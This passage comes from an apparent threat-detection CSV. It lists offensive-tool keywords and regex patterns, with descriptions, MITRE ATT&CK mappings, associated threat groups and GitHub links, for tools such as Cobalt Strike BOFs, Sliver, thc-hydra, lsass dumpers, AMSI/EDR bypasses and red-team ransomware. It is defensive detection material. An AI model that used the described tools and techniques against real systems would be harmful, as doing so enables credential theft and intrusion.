STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","61202" "*tgtdelegation.cna*",".{0,1000}tgtdelegation\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","61203" 
"*tgtdelegation.x64*",".{0,1000}tgtdelegation\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","61204" "*tgtdelegation.x86*",".{0,1000}tgtdelegation\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the 
host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","61205" "*tgtParse.py *",".{0,1000}tgtParse\.py\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","61206" "*th3rd/heroinn*",".{0,1000}th3rd\/heroinn.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","61207" "*TH3xACE/EDR-Test*",".{0,1000}TH3xACE\/EDR\-Test.{0,1000}","offensive_tool_keyword","EDR-Test","Automating EDR Testing with reference to MITRE ATTACK via Cobalt Strike [Purple Team].","T1027 - T1059 - T1105 - T1203 - T1078","TA0007 - TA0005 - TA0011 - 
TA0002","N/A","N/A","Exploitation tool","https://github.com/TH3xACE/EDR-Test","1","1","N/A","N/A","N/A","2","150","20","2023-03-27T11:39:32Z","2022-03-27T08:58:49Z","61208" "*Thank you for using ADeleginator. Godspeed! :O*",".{0,1000}Thank\syou\sfor\susing\sADeleginator\.\sGodspeed!\s\:O.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","61209" "*Thank you for using DNSCrypt-Proxy!*",".{0,1000}Thank\syou\sfor\susing\sDNSCrypt\-Proxy!.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","61210" "*Thanks for using GTFONow!*",".{0,1000}Thanks\sfor\susing\sGTFONow!.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","61211" "*THASH /runts /user:*",".{0,1000}THASH\s\/runts\s\/user\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential 
Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","61212" "*thc-hydra*",".{0,1000}thc\-hydra.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","61213" "*thc-hydra.git*",".{0,1000}thc\-hydra\.git.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","61214" "*thc-hydra.git*",".{0,1000}thc\-hydra\.git.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","61215" "*The AS-REQ is valid! Attempting to roast *",".{0,1000}The\sAS\-REQ\sis\svalid!\sAttempting\sto\sroast\s.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","61216" "*The backdoor just signaled an ACK. 
This should not have happened*",".{0,1000}The\sbackdoor\sjust\ssignaled\san\sACK\.\sThis\sshould\snot\shave\shappened.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","61217" "*The evil_ddl_trigger trigger has been added. It will run with any DDL event.*",".{0,1000}The\sevil_ddl_trigger\strigger\shas\sbeen\sadded\.\sIt\swill\srun\swith\sany\sDDL\sevent\..{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","61219" "*The exploit is ready. 
A reboot is now required to trigger it*",".{0,1000}The\sexploit\sis\sready\.\sA\sreboot\sis\snow\srequired\sto\strigger\sit.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","0","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","61220" "*The implant command allows users to run commands on slivers from their*",".{0,1000}The\simplant\scommand\sallows\susers\sto\srun\scommands\son\sslivers\sfrom\stheir.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","61221" "*The malware Go file has been completed.*",".{0,1000}The\smalware\sGo\sfile\shas\sbeen\scompleted\..{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","61222" "*The nanodump was created succesfully*",".{0,1000}The\snanodump\swas\screated\ssuccesfully.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 
- TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","61223" "*The Ransomware for RedTeams Coded by Siddhant Gour with *",".{0,1000}The\sRansomware\sfor\sRedTeams\sCoded\sby\sSiddhant\sGour\swith\s.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","61224" "*The Relaying Kerberos Framework - SMB Server edition by @decoder_it*",".{0,1000}The\sRelaying\sKerberos\sFramework\s\-\sSMB\sServer\sedition\sby\s\@decoder_it.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#content","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","61225" "*The smart password spraying and bruteforcing tool for Active Directory Domain Services*",".{0,1000}The\ssmart\spassword\sspraying\sand\sbruteforcing\stool\sfor\sActive\sDirectory\sDomain\sServices.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","61226" "*the-backdoor-factory-master*",".{0,1000}the\-backdoor\-factory\-master.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 
- T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","61228" "*TheCyb3rAlpha/BobTheSmuggler*",".{0,1000}TheCyb3rAlpha\/BobTheSmuggler.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","1","N/A","N/A","10","6","534","62","2025-03-10T07:32:22Z","2024-01-10T08:04:57Z","61230" "*TheD1rkMtr/AMSI_patch*",".{0,1000}TheD1rkMtr\/AMSI_patch.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","N/A","8","2","145","29","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z","61231" "*TheD1rkMtr/D1rkInject*",".{0,1000}TheD1rkMtr\/D1rkInject.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","61232" "*TheD1rkMtr/DocPlz*",".{0,1000}TheD1rkMtr\/DocPlz.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data 
Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","61233" "*TheD1rkMtr/GithubC2*",".{0,1000}TheD1rkMtr\/GithubC2.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","N/A","10","10","136","37","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z","61234" "*TheD1rkMtr/HeapCrypt*",".{0,1000}TheD1rkMtr\/HeapCrypt.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","N/A","9","3","239","44","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z","61235" "*TheD1rkMtr/NTDLLReflection*",".{0,1000}TheD1rkMtr\/NTDLLReflection.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","N/A","9","3","293","45","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z","61236" "*TheD1rkMtr/Pspersist*",".{0,1000}TheD1rkMtr\/Pspersist.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z","61237" 
"*TheD1rkMtr/Shellcode-Hide*",".{0,1000}TheD1rkMtr\/Shellcode\-Hide.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","61238" "*TheD1rkMtr/StackCrypt*",".{0,1000}TheD1rkMtr\/StackCrypt.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","N/A","9","2","159","27","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z","61239" "*TheD1rkMtr/UnhookingPatch*",".{0,1000}TheD1rkMtr\/UnhookingPatch.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","N/A","9","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","61240" "*TheGejr/SpringShell*",".{0,1000}TheGejr\/SpringShell.{0,1000}","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/TheGejr/SpringShell","1","1","N/A","N/A","N/A","2","127","84","2022-04-04T14:09:11Z","2022-03-30T17:05:46Z","61241" "*theHarvester*",".{0,1000}theHarvester.{0,1000}","offensive_tool_keyword","theHarvester","E-mails. 
subdomains and names Harvester.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Reconnaissance","https://github.com/laramies/theHarvester","1","0","N/A","N/A","N/A","10","12476","2143","2025-04-22T21:05:21Z","2011-01-01T20:40:15Z","61242" "*theHarvester.py -d *",".{0,1000}theHarvester\.py\s\-d\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","61243" "*thelinuxchoice/saycheese*",".{0,1000}thelinuxchoice\/saycheese.{0,1000}","offensive_tool_keyword","saycheese","Grab target's webcam shots by link","T1213 - T1071 - T1102 - T1123 - T1185 - T1200","TA0001 - TA0005 - TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/hangetzzu/saycheese","1","1","#linux","N/A","9","10","1175","962","2024-06-18T23:39:41Z","2019-04-29T04:07:00Z","61244" "*thelinuxchoice/tweetshell*",".{0,1000}thelinuxchoice\/tweetshell.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","#linux","N/A","7","10","3581","391","2024-09-02T19:15:22Z","2019-03-28T18:07:05Z","61245" "*ThemeBleed.exe *",".{0,1000}ThemeBleed\.exe\s\s.{0,1000}","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tool","https://github.com/gabe-k/themebleed","1","0","N/A","N/A","10","2","196","37","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z","61246" 
"*ThePorgs/Exegol-images*",".{0,1000}ThePorgs\/Exegol\-images.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","61247" "*therealwover@protonmail.com*",".{0,1000}therealwover\@protonmail\.com.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","#email","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","61248" "*TheresAFewConors/MSSprinkler*",".{0,1000}TheresAFewConors\/MSSprinkler.{0,1000}","offensive_tool_keyword","MSSprinkler","password spraying utility for organizations to test their M365 accounts from an external perspective. 
It employs a 'low-and-slow' approach","T1110.003 - T1110.001","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/TheresAFewConors/MSSprinkler","1","1","N/A","N/A","9","1","74","7","2025-02-25T13:32:41Z","2024-09-15T09:54:53Z","61249" "*TheRook/subbrute*",".{0,1000}TheRook\/subbrute.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","1","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","61250" "*The-Viper-One/Invoke-PowerIncrease*",".{0,1000}The\-Viper\-One\/Invoke\-PowerIncrease.{0,1000}","offensive_tool_keyword","Invoke-PowerIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/The-Viper-One/Invoke-PowerIncrease","1","1","N/A","N/A","8","1","3","0","2024-08-01T18:10:02Z","2024-07-18T17:40:26Z","61251" "*The-Viper-One/Invoke-RDPThief*",".{0,1000}The\-Viper\-One\/Invoke\-RDPThief.{0,1000}","offensive_tool_keyword","Invoke-RDPThief","perform process injection on the target process and inject RDPthief into the process in order to capture cleartext credentials","T1055 - T1056 - T1071 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/The-Viper-One/Invoke-RDPThief","1","1","N/A","N/A","10","1","62","8","2025-01-21T20:12:33Z","2024-10-01T20:12:00Z","61252" "*The-Viper-One/PME-Scripts*",".{0,1000}The\-Viper\-One\/PME\-Scripts.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
